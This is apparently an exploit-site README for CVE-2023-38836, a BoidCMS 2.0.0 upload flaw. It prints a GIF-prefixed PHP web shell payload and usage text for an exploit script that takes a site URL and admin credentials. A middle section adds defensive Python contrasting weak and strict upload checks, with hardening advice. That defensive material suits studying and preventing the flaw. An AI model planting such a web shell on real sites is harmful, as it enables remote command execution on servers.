## https://sploitus.com/exploit?id=71FAB470-AB01-5B86-BE55-149570ADE147
# CVE-2023-38836 Exploit
A file upload vulnerability in BoidCMS v.2.0.0 allows an authenticated attacker to upload a file of a dangerous type (CWE-434).

To exploit it, an attacker could add a GIF header to the uploaded file to bypass the MIME type checks.
```php
GIF89a;
<?php system($_GET["cmd"]); ?>
```
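
For defenders, the following added example (not part of the original exploit repository and not BoidCMS code) contrasts a magic-byte-only upload check, which a GIF-prefixed file passes, with a stricter check that also looks at the file name and body. The function names, the extension lists, and the sample bytes are assumptions constructed for illustration.

```python
import os

# Magic-byte prefixes a content sniffer typically maps to image types.
MAGIC = {
    b"GIF87a": "image/gif",
    b"GIF89a": "image/gif",
    b"\x89PNG\r\n\x1a\n": "image/png",
    b"\xff\xd8\xff": "image/jpeg",
}
ALLOWED_EXT = {
    "image/gif": {"gif"},
    "image/png": {"png"},
    "image/jpeg": {"jpg", "jpeg"},
}
# Assumed list of extensions mapped to the PHP handler; match it to the server config.
EXEC_EXT = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "pht"}
PHP_TAGS = (b"<?php", b"<?=")


def sniff_mime(data):
    """Return the image type implied by the leading bytes, or None."""
    for magic, mime in MAGIC.items():
        if data.startswith(magic):
            return mime
    return None


def weak_check(filename, data):
    """The flawed pattern: accept anything whose first bytes look like an image."""
    return sniff_mime(data) is not None


def strict_check(filename, data):
    """Return a list of rejection reasons; an empty list means accept."""
    reasons = []
    mime = sniff_mime(data)
    # Every dot-separated suffix counts, so "x.php.gif" is inspected too.
    parts = os.path.basename(filename).lower().split(".")[1:]
    if mime is None:
        reasons.append("content is not a recognised image")
    if any(p in EXEC_EXT for p in parts):
        reasons.append("executable extension in file name")
    if not parts or parts[-1] not in ALLOWED_EXT.get(mime, set()):
        reasons.append("extension does not match sniffed type")
    if any(tag in data.lower() for tag in PHP_TAGS):  # the open tag is case-insensitive
        reasons.append("PHP open tag in file body")
    return reasons


# Constructed samples: a tiny GIF and a GIF-prefixed file with a harmless PHP body.
CLEAN_GIF = b"GIF89a\x01\x00\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;"
POLYGLOT = b"GIF89a;\n<?php echo 'marker'; ?>"
```

The `<?=` marker is short enough to occur by chance in binary image data, so treat a body match as a reason for review rather than proof. Storing uploads under server-generated names in a directory where the PHP handler is disabled removes the dependence on content checks altogether.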

## Usage
```
usage: exp.py [-h] [-u URL] [-l USER] [-p PASSWD]

Exploit for CVE-2023-38836

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     website url
  -l USER, --user USER  admin username
  -p PASSWD, --passwd PASSWD
                        admin password
```

![](img.png)